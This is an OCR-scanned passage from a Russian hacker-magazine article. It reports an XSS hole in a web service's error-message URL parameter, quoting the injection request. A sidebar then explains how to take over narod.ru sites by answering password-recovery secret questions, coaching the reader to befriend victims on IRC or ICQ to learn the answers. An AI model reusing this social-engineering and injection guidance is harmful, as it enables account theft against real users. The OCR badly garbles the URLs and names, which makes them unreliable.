сервиса, могут общаться друг с другом посредством личных сообщений. 

Список наиболее активных пользователей есть на головной странице проекта. Именно 
через рассылку личных сообщений я и пытался осуществить СЗЗ-нападение. После по- 
пытки войти под своим старым аккаунтом (он был заведен еще с незапамятных времен, 
когда я только начинал заниматься веб-строительством) меня перекинуло на страницу 
Іііір://5ііесііу.ги/ЬасІІодіп.рІіііпІ?те55аде=Неверный логин. Думаю, не нужно пояснять, 
что было после того как я посмотрел на адрес страницы с ошибкой. Тут же последовал 
запрос: ІіТТр://5ІТесіТу.ги/ЬасІІодіп.рІіТппІ?іпе55аде=<М>ХАКЕР</М>. Результат виден на 
скриншоте. К сожалению, я так и не смог зарегистрироваться на сервисе, чтобы изучить 
кукисы юзера, а проводить атаку на сторонних пользователей я не захотел. Но в любом 
случае брешь есть, и хакер может использовать ее для своих грязных целей. 

[заключение] Как видишь, даже такие серьез- 
ные и популярные сервисы имеют недостатки в 
защите. Да, нанести сервису серьезный вред 
не удалось, однако заполучить аккуант практи- 
чески любого юзера не составит труда. И что-то 
мне подсказывает, что еще очень долго после 
выхода этой статьи брешь так и будет оставать- 
ся неприкрытой. Взять, например, пеѵѵтаіі.ги. 
Об аналогичном баге я писал два месяца на- 
зад, а дыра так и осталась незакрытой. Такое 
положение дел объясняется прежде всего 
ленью админов и их нежеланием защищать 
собственных пользователей. Хотя, может, они 
просто не читают «Хакер»? © 




[КАК ТОПИЛИ 
НАРОД.РУ РАНЬШЕ] 

Когда эта статья была уже почти 
написана, я решил проверить, были 
ли прецеденты взлома этого хос- 
тинга. Существуют ли какие-нибудь 
баги в системе народа? Загрузив 
Яндекс, я вбил соответствующий 
запрос. На меня высыпалось нес- 
колько десятков тысяч линков на 
сайты с заголовком «Взлом сайтов 
на народ.ру!!!». Это меня, мягко го- 
воря, удивило, и я, загрузив сразу 
пять линков, начал изучать хак-стори. 
На самом деле никакой хак-стори 



не было. Взламывать сайты на на- 
род.ру предлагалось при помощи 
методов социальной инженерии, то 
есть липовыми письмами от адми- 
нистрации хостинга с просьбой вос- 
становить пароли по адресу геаі- 
зирроіі-пагосі.ги.ііакег.ги или, еще 
примитивнее, выслать на мыло. 

Это навело меня на некоторые 
мысли, и я, недолго думая, пере- 
местился к пункту восстановления 
пароля с главной страницы хостин- 
га. Для того чтобы забывчивому 
юзеру напомнили его пароль, необ- 
ходимо ответить на секретный воп- 



рос вроде: «Ваше любимое блю- 
до?» или «Девичья фамилия мате- 
ри?». После ввода верного ответа 
будет предложено ввести новый 
пасс. Понятно, что если ты хорошо 
знаешь человека, то не составит 
труда отнять у него ящик. Отобрать 
сайт будет так же просто, как мы- 
ло по тазику гонять, даже если ты 
не знаком с жертвой. Никто же не 
отменял ІВС и ІСО, к которым 
можно втереться в доверие и 
спросить о кулинарных пристрас- 
тиях пациента, либо же разузнать 
кличку его собаки. 






